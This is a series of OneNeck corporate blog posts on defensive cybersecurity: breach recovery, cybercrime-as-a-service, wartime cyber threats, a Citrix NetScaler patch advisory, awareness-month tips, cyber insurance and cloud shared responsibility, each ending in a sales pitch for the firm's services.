In the aftermath of a cyber breach, communication becomes a pivotal front in maintaining trust. The way an organization handles information sharing can significantly influence its reputation and the trust it has built.

Internally, it’s crucial to keep staff informed. This transparency ensures that employees, from the C-suite to the frontline, understand the breach’s implications and the remedial actions underway. This clarity prevents the spread of confusion and aligns the team’s response efforts.

Externally, the need for openness is even more critical. Customers and partners who have entrusted their data to the organization deserve to know the breach’s impact. Transparency with these stakeholders and, when necessary, the media is fundamental to maintaining the organization’s integrity. Timely and forthright communication helps manage public perception, ensuring the breach does not permanently damage the organization’s image.

Damage Control: Assessing and Recovering from a Breach

After addressing the immediate threats of a cyber breach, organizations must turn to a meticulous investigation of the incident. Like detectives reconstructing the events at a crime scene, they must identify the breach’s nature, scope and origin. Key steps include:

• Conducting a Forensic Analysis – Tracing the attack’s pathways to assess the extent of the infiltration. This helps determine if the breach was a targeted attack or a random malware strike, which is crucial for crafting an effective defense strategy.
• Identifying the Breach’s Source – Determining whether it was an external attack, an internal oversight, or a combination of factors. Pinpointing the cause is essential to prevent similar incidents in the future.
• Assessing the Compromised Data – Understanding the type of data compromised to dictate the recovery strategy. The response might range from notifying affected parties to enhancing security protocols, depending on whether sensitive customer information or operational data was involved.

Navigating the Aftermath of a Breach: Technical Recovery and Legal Obligations

One of the most effective preventive measures against cyber threats is ensuring that systems are continuously updated. Every software update often comes with patches that address known vulnerabilities. By neglecting these updates, organizations leave their doors open to cybercriminals always looking for such weaknesses.

But what happens when cybersecurity preventions fail? That’s where backups and disaster recovery come into play. Think of backups as safety nets, ready to catch you when you fall. In the unfortunate event of data loss due to a breach, having a recent backup and an effective disaster recovery plan means you can restore your systems to their pre-breach state with minimal downtime. This swift restoration minimizes operational disruptions and helps maintain trust with stakeholders who expect uninterrupted service.

However, the aftermath of a breach isn’t just about technical recovery. There’s a legal landscape to navigate. Different regions have varying data protection laws, many of which mandate timely notifications to affected parties in the event of a data breach. Non-compliance can result in hefty fines and further reputational damage. Thus, being aware of and compliant with these regulations is not a mere formality; it’s an integral part of post-breach management.

Learning from a Breach: Training and Review

When the dust settles, stepping back and analyzing the incident is essential. What vulnerabilities were exploited? Were there any lapses in protocol or human errors? Answering these questions provides a roadmap for strengthening cybersecurity measures.

However, technical safeguards are just one piece of the puzzle. Human error remains one of the most significant vulnerabilities in any security system. Continuous employee training is crucial. Regular training sessions ensure that staff are aware of the latest threats and equipped with the knowledge to counteract them. From phishing scams to sophisticated malware attacks, employees should be the first line of defense, not the weakest link.

Moreover, cybersecurity training should not be a one-off event. Regular updates, refresher courses and drills can help ingrain security best practices in the organizational culture.

While technology provides the means to combat cyber threats, your employees wield these tools. Investing in their training and fostering a culture of security awareness ensures that they’re always ready, vigilant, and proactive in the face of potential breaches.

Fortify Your Organization Against a Breach

OneNeck is more than just a vendor; we’re your cybersecurity partner. Whether you are looking to strengthen your overall security posture, utilize cost-effective vCISO services, conduct comprehensive security assessments, ensure timely patching or empowering your team with top-notch training, we’re here to help. Our expertise and commitment ensure that you’re prepared for today’s threats and the challenges of tomorrow.

Don’t wait for a breach to reveal the gaps in your cyber-defenses. Contact us today, and let’s work together to build a resilient and robust security framework for your organization.

The “as a Service” model has undoubtedly transformed the way businesses operate. From Software as a Service (SaaS) to Infrastructure as a Service (IaaS) and Platform as a Service (PaaS), these models have been instrumental in streamlining operations and promoting innovation. Yet, lurking in the digital shadows is a more sinister iteration of this model— Cybercrime as a Service (CaaS).

Advent of CaaS: Democratizing Cybercrime

The introduction of CaaS marked a pivotal moment in the evolution of cyber threats. This model transformed cybercrime from isolated acts of digital mischief into a structured and scalable service. With CaaS, cybercrime is no longer confined to the tech-savvy elite. Instead, it became a marketplace where malicious tools, infrastructure, and services are readily available for purchase or rent.

CaaS platforms offer a range of services, from ransomware toolkits to botnets for rent, making it alarmingly simple for individuals with limited technical knowledge to launch sophisticated cyberattacks. This shift not only increased the volume of cyberattacks (an attack every 39 seconds) but also their complexity and impact.

The primary driver behind CaaS is profit. By commodifying cybercriminal tools and services, CaaS providers have tapped into a lucrative market, catering to a growing clientele of aspiring cybercriminals. This commercial approach has led to a surge in cybercrime activities as attacks become more accessible to a broader audience.

In essence, CaaS has streamlined and professionalized the world of cybercrime. What was once a domain of individual hackers has now morphed into an organized, service-driven industry with revenue streams, customer bases and even customer support.

The Dark Web’s Marketplace

At its core, CaaS provides a platform where individuals or groups with malicious intent can offer cybercriminal tools, infrastructure, and services to other criminals for a fee. This model has dramatically democratized the world of cybercrime. Previously, launching a sophisticated cyberattack required considerable technical expertise. Now, thanks to CaaS, even those with limited technical knowledge can orchestrate advanced cyberattacks.

Cybercrime as a Service offers an array of malicious tools and services. Here’s a closer look at some of the primary offerings:

• Ransomware as a Service – This service provides clients with ready-made ransomware toolkits. These toolkits encrypt a victim’s data and demand a ransom for its release, turning digital assets into hostages for extortion activities.
• Exploit as a Service – These are specialized tools for targeted malware campaigns. They exploit known vulnerabilities in software and systems, allowing cybercriminals to infiltrate and compromise targeted devices or networks.
• Phishing as a Service – This service delivers comprehensive phishing campaigns, often mimicking legitimate entities, to deceive individuals into revealing sensitive information. These campaigns steal data such as login credentials, credit card numbers, and other personal information.
• DDoS-for-Hire – Distributed denial-of-service (DDoS) attacks are a common form of cyber-attack that overwhelms targeted websites or networks by flooding them with an excessive amount of traffic.
• Botnets for Rent – This service offers networks of infected computers, known as ‘zombies,’ available for lease. Hackers can utilize these extensive networks to distribute spam emails, mine cryptocurrencies, or launch DDoS attacks to overwhelm targeted websites.

Economic Impact of CaaS

The rise of Cybercrime as a Service has brought about profound financial implications. The commodification of cybercriminal tools and services has not only democratized the world of cybercrime but has also turned it into a highly profitable venture. According to a report from AtlasVPN, the annual revenue generated from CaaS activities is estimated to exceed $1.6 billion.

This booming segment of the cybercrime ecosystem is not without its consequences. The ease of access to malicious tools and services has led to a sharp increase in cybercrime incidents. For businesses, this means not only direct financial losses from attacks (predicted to reach $10.5 trillion by 2025) but also potential reputational damage, which can have long-lasting effects on customer trust and brand value. Individuals also find themselves at heightened risk, facing threats to personal data and financial assets. The economic shadow cast by CaaS is vast, affecting entities ranging from large corporations to everyday internet users.

Defending Against the CaaS Threat

The commercialization and accessibility of cybercrime tools mean that threats can come from any direction and at any time. To effectively counter these threats and safeguard their digital assets, businesses need to adopt a holistic approach to cybersecurity. Combatting the menace of Cybercrime as a Service requires a comprehensive and multi-faceted approach:

• Proactive Defense – Organizations must cultivate a culture of proactive cybersecurity measures and accountability.
• Collaborative Engagement – It’s essential to coordinate with industry associations, law enforcement, and the broader cybersecurity community to form a united front against cyber threats.
• Continuous Learning – By analyzing past security incidents, organizations can learn, adapt, and bolster their defense mechanisms. Additionally, training employees to be aware of threats and how to respond appropriately is critical.
• Advanced Security Measures – Employing cutting-edge security solutions ensures real-time monitoring, swift threat detection, and rapid response.

One particularly effective way for organizations to combat the onslaught of attacks generated through CaaS is by deploying Managed Detection and Response (MDR). MDR combines sophisticated technology alongside artificial and human intelligence to continuously monitor your systems for threats and mitigate incidents. This security solution helps discover and intercept attacks before significant damage occurs. 

Strengthening Defenses Against Security Threats

The escalating threat of Cybercrime as a Service underscores the importance of organizations to be proactive and well-prepared. Seeking expert guidance and forming strategic partnerships can make all the difference. OneNeck offers a comprehensive suite of security solutions tailored to address the challenges of today’s cyberattacks, including those generated by CaaS. By aligning with trusted partners like OneNeck, organizations can bolster their defenses, ensuring a secure and resilient digital environment in the face of these evolving threats.

Don’t wait for a breach to happen. Contact our security experts today.

Cyberattacks during wartime have become a potent weapon, affecting the warring nations and regular citizens worldwide. Such shifts in cyber threats highlight the interconnected nature of our digital world, where geopolitical events in one region can have digital repercussions across the globe. A recent example underscores this global reach: the Israel-Hamas conflict has increased cyber threats even in seemingly unrelated countries like Australia. With this evolving landscape of digital warfare, it’s crucial to understand the various cyberattacks that emerge during conflicts and their potential impacts.

DoS Attacks: More Than Just Wartime Cyberattacks

Denial of Service (DoS) attacks aim to incapacitate systems vital for offensive and defensive measures. By targeting infrastructure and applications that fortify and defend, attackers can effectively blind these systems, potentially masking a physical assault. Critical systems, whether for gathering intelligence, executing attacks, or facilitating communication, can be interrupted, severely limiting or preventing retaliation. Within hours of Hamas rockets entering Israel, DoS attacks started to spring up on Palestinian and Israeli sites, including nearly 3 dozen directed at Israeli government pages.

While the average individual might not directly encounter these cyberattacks, the implications for businesses are profound. Software and hardware companies supplying defense contracts should be proactive, anticipating the need for patching vulnerabilities and assisting in recovery and restoration efforts. Alarmingly, attackers might even compromise these defense-related companies well before conflicts arise, scouting for weaknesses to exploit.

Propaganda and False Information: Manipulating the Masses

In the age of information, controlling the narrative is a powerful tool. The compromise of news websites, especially during conflict, can significantly sway public perception. With awareness of this power, attackers employ various tactics to manipulate the masses. By attempting to swing the narrative in their favor, they can elicit support for a different side or even exaggerate the gravity of situations to create panic or confusion. This deception is not just about spreading false information but crafting a storyline that serves their agenda.

Unless you’re directly involved in the security of these news organizations, you’re likely a consumer of the information they provide. In such a scenario, how do you discern fact from fiction? The key lies in diversification. It’s crucial to cross-reference information, seeking out multiple sources before placing trust in a single outlet. Doing so gives you a more holistic view of events and safeguards yourself against falling prey to one-sided narratives.

Moreover, in this era of digital news, consider revisiting traditional forms of journalism, such as newspapers and magazines, which often undergo rigorous editorial processes.

Deep Fakes & AI: The New Face of Deception

With advancements in deep fake technology and AI, it’s become alarmingly easy to fabricate convincing audio and video. Deep fake technology uses advanced machine learning algorithms to craft realistic yet entirely fabricated content. The possibilities are endless and frightening, from altering speeches to manipulating facial expressions. Imagine a scenario where a video surfaces online showing a nation’s leader declaring war, admitting to crimes or even expressing sympathy for the opposition.

But it’s not just about political figures. Ordinary citizens can also become targets. From creating defamatory content to blackmail, the personal repercussions of deep fakes can be devastating.

In a world where seeing once meant believing, we now find ourselves questioning the authenticity of everything we view.

So, how can one navigate this treacherous digital landscape?

• Consider the source. Is the content coming from a reputable outlet?
• Look for corroborating evidence. Are other trusted sources reporting the same news?
• Stay informed. Tools and platforms that detect deep fakes are also emerging and can offer additional protection.

Phishing & Financial Scams: Exploiting the Heartstrings During Wartime

War, with its devastating images and heart-wrenching stories, naturally evokes a strong emotional response. Always looking for vulnerabilities, scammers recognize this emotional state as an opportunity. Malicious actors deceive people by pretending to be charitable organizations or creating stories of suffering and need.

You might receive an email detailing the plight of war victims, complete with poignant images and a call to action. Or a message on social media from a seemingly reputable organization urging immediate donations to help those in need. While the instinct to help is commendable, pausing and evaluating is crucial. With awareness and caution, one can avoid falling into these traps.

Before making any donations, always verify the legitimacy of the organization. It is important to take simple steps such as checking official websites, reading reviews, and examining an organization’s records. Be especially wary of unsolicited requests for funds, no matter how genuine they seem. Remember, legitimate organizations rarely, if ever, resort to aggressive or emotionally manipulative tactics.

Supply Chain Interruption: The Global Domino Effect

Disrupting the supply chain can deliver a significant advantage in wartime. Whether it’s the agricultural sector ensuring food supplies, the energy sector providing fuel, or the industries engaged in arms manufacturing and defense technology, no area is immune. The objective is clear: weaken the opposition by cutting off resources.

However, the ramifications of such attacks extend far beyond the immediate conflict. In our interconnected global economy, disruptions in one region can ripple across industries, economies and livelihoods worldwide. For instance, a cyberattack on an oil refinery could lead to fuel shortages, escalating prices and transportation disruptions across continents.

For global citizens and businesses, this presents a dual threat. On the one hand, there’s the direct risk of being targeted in cyberattacks aimed at weakening specific supply chain elements. On the other, there’s the indirect impact. As supply chains falter, essential commodities can become scarce, leading to increased living costs, shortages of items and even socio-economic unrest.

Navigating this complex scenario requires a multi-faceted approach. Governments and industries must collaborate to fortify their digital and physical infrastructures. Regular audits, cybersecurity training, and international cooperation can help mitigate risks. It’s a wake-up call for individuals to understand the vulnerabilities inherent in our globalized system. Being informed, prepared and adaptable can help reduce supply chain challenges.

Wartime Cyberattacks: Safeguarding Yourself with a Trusted Partner

The digital warfare landscape is vast and ever-evolving, impacting not just nations in conflict but resonating globally. Economies, societies, businesses and individual lives are intertwined, making the consequences of digital threats far-reaching. As we move forward, we must recognize the magnitude of these challenges and the importance of staying informed.

Awareness, vigilance, and proactive measures are not just buzzwords; they are necessities in this digital age. By understanding the threats and taking timely actions, we can safeguard our digital assets and ensure a more secure future for all.

OneNeck offers cutting-edge cybersecurity solutions tailored to your needs. Having a trusted partner can make all the difference in challenging times.

Contact us today for a comprehensive cybersecurity assessment and fortify your digital defenses.

The world’s attention is spread thin from the recent unrest in the Middle East to the prolonged conflict between Ukraine and Russia and a US presidential election on the horizon. These events, while primarily political and military in nature, also significantly impact our digital world. The interconnectedness of our global society means that disruptions in one area can lead to challenges in another. As geopolitical tensions rise, the online environment becomes a new battleground for conflicts, espionage, and cyberattacks. Individuals, businesses, and nations must exercise cyber vigilance, understanding that physical borders aren’t the only boundaries at risk.

Bad actors, state-sponsored and opportunistic hackers, are always looking for moments of vulnerability. They exploit the heightened emotions and distractions of global events to launch cyberattacks. As tensions escalated around Israel, documented cyberattacks paralleled the physical military confrontations. But it’s crucial to understand that these digital threats aren’t confined to the primary participants of these global events. Allies, supply chains, businesses and even individuals can find themselves caught in the crossfire.

Given the current state of affairs, it’s more important than ever for everyone to exhibit cyber vigilance. Here’s what you can do to safeguard your digital assets:

Cyber Vigilance Education

While it may be a cliché, knowledge truly is power when it comes to cybersecurity. It’s about having the right tools and cultivating an informed mindset to discern threats and act proactively. Understanding the attackers’ tactics and adopting a vigilant approach can significantly reduce our vulnerability to cyber threats. Here’s how you can bolster your cybersecurity knowledge:

• Understanding Attacker Tactics

  • Stay Informed – Regularly read up on the latest cyberattack methods. Knowledge is your first line of defense.
  • Real-world Examples – Familiarize yourself with case studies of recent cyberattacks to understand their modus operandi.

• Distrust and Verify

  • Be Skeptical – Always question unsolicited communications, especially if they ask for personal or financial information.
  • Double-check – If you receive an unexpected request, contact the person or organization directly using a verified method, like their official phone number, before taking action.

• Formal Training with KnowBe4

  • What is it? – KnowBe4 is a platform that offers security awareness training to help organizations and individuals recognize and combat cybersecurity threats.
  • Why is it important? – With the proper training, you can identify phishing emails, malicious attachments and other threats before they become a problem.

Patch Regularly

Staying updated is not just about accessing the latest features; it’s a critical defense mechanism. Regularly updating your software protects you against known vulnerabilities that cybercriminals could exploit. Think of patches as digital armor, reinforcing your systems against potential threats. Here’s why regular updates are essential and how you can maintain them:

• Update Computer Operating Systems

  • Stay Current – Manufacturers regularly release updates that patch vulnerabilities. Ensure you’re always using the latest version.
  • Automate – Set your system to update automatically whenever a new version is available.
  • Patch Management – Investing in patch management ensures critical updates are prioritized and applied in a timely manner.

• Mobile Device Updates

  • Consistent Checks – Mobile devices are frequent targets. Regularly check for software updates to stay protected.
  • Beware of Third-party Stores – Only download apps from official app stores to reduce the risk of malware.

• Application Updates

  • Why it Matters – Outdated software can have vulnerabilities that hackers exploit. Keeping them updated closes these security gaps.
  • Set Reminders – If your software doesn’t update automatically, you can use tools or set up calendar reminders to check for updates regularly. This way, you can ensure that your software is always up-to-date with the latest features and security patches.

Bolster Defenses

A proactive stance is always better than a reactive one. While staying informed and keeping systems updated is essential, having robust defenses in place is equally crucial. Think of these defenses as the walls of a digital fortress designed to keep intruders at bay. From multi-layered authentication methods to strong passwords and robust antivirus measures, here’s how you can fortify your digital defenses:

• Embrace Multi-Factor Authentication (MFA)

  • Extra Layer – MFA requires two or more verification methods. These methods often consist of something you know (password), something you have (a phone) or something you are (fingerprint).
  • Deterrence – MFA can prevent unauthorized access even if a hacker gets your password.

• Strengthen Passwords

  • Complexity is Key – Use a mix of uppercase, lowercase, numbers, and symbols. Creating passphrases is a helpful way to ensure length and complexity are accounted for while remaining memorable for the user.
  • Avoid Common Mistakes – Never use easily guessable passwords like “password123” or “admin.”
  • Use a Password Manager – These tools generate and store complex passwords for you, reducing the risk of breaches.

• Invest in Antivirus Software

  • Real-time Protection – Good antivirus software monitors your system in real-time, catching threats before they can do substantial harm.
  • Regular Scans – Schedule weekly or daily scans to ensure no malware has slipped through.

Your Trusted Cyber Vigilance Ally

Cyber vigilance is always necessary, but its importance during turbulent times cannot be overstated. While global events capture our attention, it’s essential to remember that our digital spaces require consistent protection. We boost digital safety by staying informed, maintaining vigilance and applying best practices. Especially during challenging periods, a dedicated approach to online security is crucial to prevent potential threats and maintain the integrity of digital interactions.

Choosing the right security partner is pivotal. Whether you’re looking to strengthen cybersecurity measures, enhance IT infrastructure or explore new digital solutions, OneNeck is here to support and guide you.

Don’t compromise on digital security. Contact us today; together, we’ll help ensure a robust and secure digital experience.

On October 10, 2023, Citrix released a security bulletin concerning the discovery of two critical vulnerabilities. This announcement highlighted vulnerabilities in their flagship products: NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly known as Citrix Gateway). These vulnerabilities are particularly concerning as, if successfully exploited, they could compromise the integrity and security of systems and data. Specifically, the vulnerabilities could lead to:

• CVE-2023-4966: Sensitive information disclosure
• CVE-2023-4967: Denial of service

Source: Citrix

Affected NetScaler Versions

The following versions of NetScaler ADC and NetScaler Gateway are affected:

• NetScaler ADC and NetScaler Gateway 14.1 before 14.1-8.50
• NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.15
• NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.19
• NetScaler ADC 13.1-FIPS before 13.1-37.164
• NetScaler ADC 12.1-FIPS before 12.1-55.300
• NetScaler ADC 12.1-NDcPP before 12.1-55.300

These vulnerabilities do not directly impact customers utilizing Citrix-managed cloud services or Citrix-managed Adaptive Authentication, and, as such, no immediate action is required.

Another important item to note is that NetScaler ADC and NetScaler Gateway version 12.1 is now End-of-Life (EOL) and remains vulnerable.

For more detailed information, please refer to the official Citrix security bulletin on the Citrix Knowledge Center.

Recommended Action

In light of these recent discoveries, OneNeck cannot emphasize enough the importance of timely action. We strongly urge all affected customers to prioritize the installation of the updated versions of NetScaler ADC and NetScaler Gateway. By doing so, you can ensure your systems’ continued security and integrity, safeguarding them against potential exploits.

We have some reassuring news for our valued customers utilizing OneNeck’s managed services. We’ve already initiated contact and are actively supporting you in addressing these vulnerabilities. Rest assured, we’re on top of this situation to ensure your systems remain secure.

OneNeck’s Commitment to Customer Security

At OneNeck, we prioritize the security of our customers. We understand the complexities and challenges of managing and updating IT infrastructure. Beyond these immediate concerns, we also offer Citrix Assurance Services as well as comprehensive patch management to ensure long-term system security and stability. As a trusted partner, we stand ready to help any customer needing support, whether for installing the necessary patches or for broader IT management solutions.

Additionally, we invite you to check out our Monthly Patching Blog series. It’s a valuable resource to keep you informed on the latest critical updates from our vendors, ensuring you’re always ahead of potential threats.

If you require assistance or have any concerns, please contact our Customer Care Center. Our team is ready and available to guide you through the update process and beyond, ensuring your systems remain secure and resilient.

October is more than just the month of fall foliage and Halloween; it’s a period that has, for the past two decades, been dedicated to cybersecurity. As we mark the 20th Cybersecurity Awareness Month, it’s clear that with the increasing volume and sophistication of cyberattacks, cybersecurity and its subsequent awareness are just as, if not more, important today. The collaborative efforts of governmental agencies and those in the tech industry underscore the imperative of ensuring individuals and businesses remain secure.

Cybersecurity Awareness Month: A Two Decades Journey

Cybersecurity Awareness Month was established when our digital landscape looked quite different. Following the tragic events of 9/11, government agencies and tech industry leaders collectively recognized the critical need for digital safety. Organizations including the Department of Homeland Security (DHS), the White House, and tech leaders such as Microsoft, Amazon, Cisco and others joined together to educate the public on the necessity of safe technology usage. This effort gave birth to Cybersecurity Awareness Month. This campaign has evolved over the years to be co-managed by the National Cybersecurity Alliance (NCA) and the U.S. Cybersecurity and Infrastructure Security Agency (CISA).

During its first instance, the primary advice of Cybersecurity Awareness Month was straightforward: change passwords in tandem with smoke detector battery replacements. While this was a practical starting point, the digital landscape has evolved dramatically. With the rise in volume and sophistication of cyberattacks, such simplistic advice is no longer sufficient. The nature of threats has shifted from mere password breaches to advanced persistent threats, ransomware attacks, and sophisticated phishing schemes. The goals and recommendations have matured over the years, reflecting the complexities of today’s cyber threats.

With that said, one of the primary objectives of Cybersecurity Awareness Month is to let users know that being safer does not need to be overly complicated or arduous. Rather, by adding a handful of simple actions to our daily routines, we can all become significantly safer whenever we are online.

Image source: cisa.gov

Everyday Actions for Cybersecurity Awareness Month

Awareness is undeniably the foundation of digital safety. However, it’s the actions we take, based on that awareness, that truly determine our security in the digital realm. This year’s theme from CISA, “Secure Our World,” is a firm reminder, emphasizing our collective role in fortifying the digital space. Let’s delve deeper into the four actions highlighted by the campaign:

Use Strong Passwords

In today’s digital age, where data breaches have unfortunately become commonplace, the significance of using robust passwords cannot be overstated. A strong password is the first line of defense against potential cyber threats. But what constitutes a strong password? In a post from earlier this year, OneNeck’s Security Specialist, Nick Santilli, states that ideally, it should be a combination of letters (uppercase and lowercase), numbers and special symbols, making it difficult for cybercriminals to guess or crack. He further recommends that instead of passWORDS, think more in terms of passPHRASES. Passphrases are typically longer than passwords and, therefore, harder to crack.

Moreover, with the plethora of online accounts most of us manage, remembering unique passwords for each can be daunting. This need for password organization is where password managers come into play. These tools store your passwords securely and generate strong, random passwords for your accounts.

Enable Multi-Factor Authentication (MFA)

While a strong password is crucial, it’s not infallible. Cybercriminals have developed methods to compromise even the most complex passwords. This need to supplement the protection offered by login credentials is where Multi-Factor Authentication (MFA) steps in.

As mentioned in our March blog, To MFA or Not to MFA – It’s Not Really a Question Anymore, MFA requires users to provide two or more verification factors to access an account, making unauthorized access incredibly challenging. This validation could be something you know (password), something you have (a phone or hardware token), or something you are (fingerprint or facial recognition). By adding this additional layer of security, even if an attacker manages to steal your password, they won’t be able to access your account without the second verification factor.

Recognize and Report Phishing

Phishing attacks are the most common form of cybercrime. Cybercriminals craft seemingly legitimate emails, messages or websites to deceive individuals into providing sensitive data, such as personally identifiable information, banking details or login credentials. It’s imperative to be discerning and vigilant. For organizations, educating and training employees is essential. One particularly effective method to train and test is using simulated phishing attacks.

While organizations can employ training methods, individuals must also be vigilant in recognizing and responding to potential threats. Always verify the source before clicking on any links or downloading attachments. Look for telltale signs of phishing, such as generic greetings, spelling errors or suspicious email addresses. Trust your instincts and avoid interacting with the message if something seems amiss. Moreover, reporting suspicious activity is fundamental in curbing such threats and ensuring that others are warned quickly.

Regularly Update Software

The digital landscape is dynamic, with cyber threats constantly evolving. To counter these threats, software developers regularly release updates that patch known vulnerabilities. Keeping your software updated, be it your operating system, applications or antivirus, protects against the latest known threats.

Auto-updates are one option for keeping software current. Still, they might not always be feasible for organizations due to compatibility issues, work schedules or other business requirements. In such cases, investing in patch management becomes crucial. Patch management ensures that updates and patches are prioritized and applied promptly, offering a structured approach to maintaining software security.

OneNeck: Your Partner for Cybersecurity Awareness Month and Beyond

At OneNeck, our core values resonate deeply with the goals of Cybersecurity Awareness Month. While security might be intricate for professionals, we understand that it should be accessible and straightforward for everyone else. Simple measures such as MFA, password managers and cybersecurity education (like recognizing phishing scams) can significantly enhance digital security for your business.

Take action this Cybersecurity Awareness Month. Partner with OneNeck, and let’s work together to fortify your digital defenses, ensuring a safer and more secure online environment for your business.

Cybersecurity is a critical concern for organizations worldwide. As businesses increasingly rely on networked technologies, potential risks and vulnerabilities have escalated. Consequently, cyber insurance has become a vital tool in the risk management strategy of many organizations. In this blog, we delve into cyber insurance, highlighting its necessity, the challenges in acquiring it and strategies to secure better rates and coverage.

The Growing Need for Cyber Insurance

Cyber insurance serves as a safety net, helping organizations mitigate the financial and operational repercussions of cyber threats like ransomware. However, many businesses are at a crossroads, unsure of what policies to obtain or if insurers will even underwrite their risk.

Recent research underscores the growing perception among organizations that ransomware poses a significant threat to their viability. Despite increased awareness and dedicated efforts to counter these threats, a mere 15% of companies have adopted active cyber insurance policies, as the Enterprise Strategy Group (ESG) reported.

Challenges in Acquiring Cyber Insurance

While it stands to reason that obtaining cyber insurance should be a straightforward process, given its importance for most organizations, the actual experience tells a different story. Organizations frequently encounter a series of obstacles in pursuing cyber insurance. These hurdles, including soaring premium rates and rigid underwriter requirements, add layers of complexity to the acquisition process.

A notable 56% of IT and security leaders find it challenging to navigate these hurdles, highlighting the need for expert guidance to facilitate a smooth policy acquisition process. Let’s examine the primary challenges organizations face:

Escalating Rates

• Surge in Premium Rates: The cyber insurance market is experiencing a significant premium rate increase. This surge is primarily attributed to the growing frequency and severity of cyber-attacks, which have heightened the risk factors associated with providing coverage.
• Market Dynamics: The dynamics of the insurance market, influenced by global economic factors and regulatory changes, also play a crucial role in the escalation of rates. Organizations need to stay abreast of these dynamics to negotiate better terms.

Coverage Limitations

• Restricted Scope of Protection: Organizations often find that the coverage offered by cyber insurance policies is limited, restricting the scope of protection and leaving them vulnerable to uncovered threats under standard policy terms.
• Customization Challenges: Tailoring a policy to suit an organization’s unique needs and risk profile can be complicated. It requires a deep understanding of the potential risks and the ability to negotiate terms that offer comprehensive protection.

Meeting Underwriter Requirements

• Comprehensive Cybersecurity Assessment: Meeting the stringent requirements set by underwriters is a significant hurdle. This process often entails a detailed assessment of the organization’s cybersecurity posture, including evaluating the attack surface and the effectiveness of the existing security measures.
• Demonstrating a Robust Security Program: Organizations must show a robust security program encompassing vulnerability management and a well-functioning security operations function. This presentation assures underwriters of their preparedness to mitigate potential cyber threats.

What Companies Need to Know

Navigating cyber insurance requires a solid understanding of your company and the insurance landscape. The first step is a comprehensive self-assessment to gauge your company’s cybersecurity posture. This process helps identify the strengths and weaknesses of your existing cybersecurity measures, allowing you to opt for coverage that aligns precisely with your company’s needs. It is vital to avoid succumbing to the pressure of accepting terms or add-ons that do not mesh with your business operations.

Understanding the terminology and nomenclature used in the cyber insurance sector is equally important. This knowledge enables communication of your needs and empowers you to negotiate terms that serve your company’s best interests. Keeping abreast of trends and dynamics in the cyber insurance market is crucial and includes understanding insurance companies’ evaluation of potential clients.

It’s worth noting that the cyber insurance industry operates with considerable flexibility due to a lack of stringent regulations, allowing insurers significant leeway in setting terms and conditions. This freedom grants insurers substantial discretion in determining policy coverage and associated costs.

Strategies to Secure Better Cyber Insurance Rates and Coverage

It’s no secret that companies seek ways to snag better deals and broader coverage from their cyber insurance policies. Let’s walk through some key strategies that can serve as an outline for securing an approach that is both economically viable and comprehensive:

• Collaborative Assessment and Action Planning: Organizations must engage in a collaborative security assessment process to secure better rates and coverage. This involves working closely with managed service providers like OneNeck, who guide IT and security leaders through meticulously evaluating the current environment and identifying gaps. This assessment culminates in a proposed action plan that bolsters security measures and streamlines the process.
• Leveraging Managed Detection and Response (MDR) Services: Increasing numbers of organizations recognize the importance of utilizing Managed Detection and Response (MDR) services as a vital step in meeting the prerequisites for cyber insurance. Engaging with MDR providers not only helps fulfill the requirements but also strengthens the security program, enhancing the organization’s credibility and standing in the eyes of insurers.
• Building a Tailored Security Program: Every organization has a unique infrastructure and risk profile. Hence, adopting a one-size-fits-all approach to cybersecurity isn’t viable. Organizations must strive to build a security program that aligns with their environment, operating model and risk profile. This process involves understanding the attack surface, assessing external assets that add risk and implementing preventative security controls.
• Incident Response (IR) Planning: IR planning is a core activity that prepares organizations to respond effectively to cyber incidents. It encompasses a range of strategies and processes designed to mitigate the impact of cyber-attacks and ensure swift recovery. Moreover, if your company has encountered security breaches, it might influence policy eligibility and the cost. Being prepared to showcase the measures implemented to mitigate future risks can be a strong bargaining point.

Partnering with Experts for a Secure Future

Navigating the complex world of cyber insurance requires a proactive and achievable cyber defense plan. Organizations must focus on building continuous processes supported by automated tools to meet the dynamic demands of the cyber landscape. Moreover, partnering with experts like OneNeck can facilitate a seamless journey towards securing a robust cyber insurance policy, ensuring you are well-prepared to face the evolving cyber threats head-on.

To further empower your organization, we invite you to watch our insightful webinar, “Take the Driver’s Seat from Your Cyber-Insurance Underwriter.” This session, led by OneNeck industry experts, will provide you with the knowledge and tools to confidently navigate the complex landscape of cyber insurance. The webinar is available on demand, allowing you to access this valuable information at your own pace and convenience.

Contact us today to strengthen your cybersecurity posture and find the best cyber insurance solutions tailored to your needs. Our expert team is here to guide you every step of the way, ensuring a safer and more secure digital journey ahead.

Take the first step towards a proactive and fortified cyber defense strategy today.

The cloud’s vast potential is undeniable, but it also introduces a unique set of challenges that require specialized expertise. Understanding and implementing robust security measures becomes crucial as organizations transition from traditional on-premises infrastructures to cloud-based and hybrid systems.

Harnessing the Cloud: Opportunities and Obstacles

Cloud computing has significantly impacted the way companies function, offering a range of benefits that cater to modern needs. One of its primary advantages is scalability and flexibility. The cloud can adjust to varying demands for a small startup or a large enterprise. This adaptability means utilizing resources on an as-needed basis, often reducing the necessity for significant upfront investments in infrastructure. The cloud can scale to meet those demands as businesses grow or change.

Traditional IT setups involve high initial costs, from procuring hardware to establishing and maintaining data centers. In contrast, cloud computing introduces a more flexible financial model, shifting expenses to operational ones. Organizations can better manage their budgets, paying only for the resources they use. This provides financial flexibility and reduces reliance on physical hardware, allowing businesses to adapt quickly to changing needs without being bogged down by legacy systems.

Cloud computing facilitates global collaboration, allowing teams worldwide to work together in real-time and access shared resources and tools. Additionally, businesses can effectively reach global markets, serving clients from any location. However, this accessibility also presents challenges; every access point in the cloud can be a potential vulnerability, underscoring the importance of robust security measures.

Shared Responsibility in Cloud Security

In cloud computing, the concept of “shared responsibility” is paramount. It delineates security obligations between the cloud service provider and the user. While the provider is typically responsible for the underlying infrastructure and ensuring the cloud platform’s security, the user is tasked with safeguarding their data and applications.

Encryption, for instance, becomes a collaborative effort where the service might offer the tools, but users must implement and manage them. Understanding and embracing this shared model is crucial for adequate cloud security, as it underscores the idea that security is a joint effort, requiring vigilance from both the provider and the user.

However, shared responsibility doesn’t end with technical measures. It extends to regulatory compliance and best practices. Standards such as NIST, HIPAA and CIS Controls serve as security and data protection benchmarks. These standards represent legal obligations and set the foundation for trust and ethical data handling. By aligning with these recognized standards, consumers and providers can ensure they meet the highest security benchmarks, further strengthening their collaborative defense against potential threats.

Network Security: A Multi-Layered Approach

